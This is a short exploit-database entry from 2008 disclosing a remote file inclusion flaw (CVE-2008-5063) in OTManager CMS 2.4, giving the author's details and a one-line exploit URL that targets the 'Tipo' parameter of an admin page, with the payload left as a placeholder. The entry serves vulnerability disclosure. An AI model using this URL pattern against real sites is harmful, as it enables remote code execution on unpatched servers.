OTManager CMS 2.4 - 'Tipo' Remote File Inclusion



EKU-ID: 14944 CVE: OSVDB-49850;CVE-2008-5063 OSVDB-ID:
Author: Colt7r Published: 2008-11-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability

  - Security flaw discovered by Colt7r
  - CONTACT: colt7r |@| bsdmail.org

  - Affected Software: OTManager 2.4
  - Risk: HIGH
  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-10]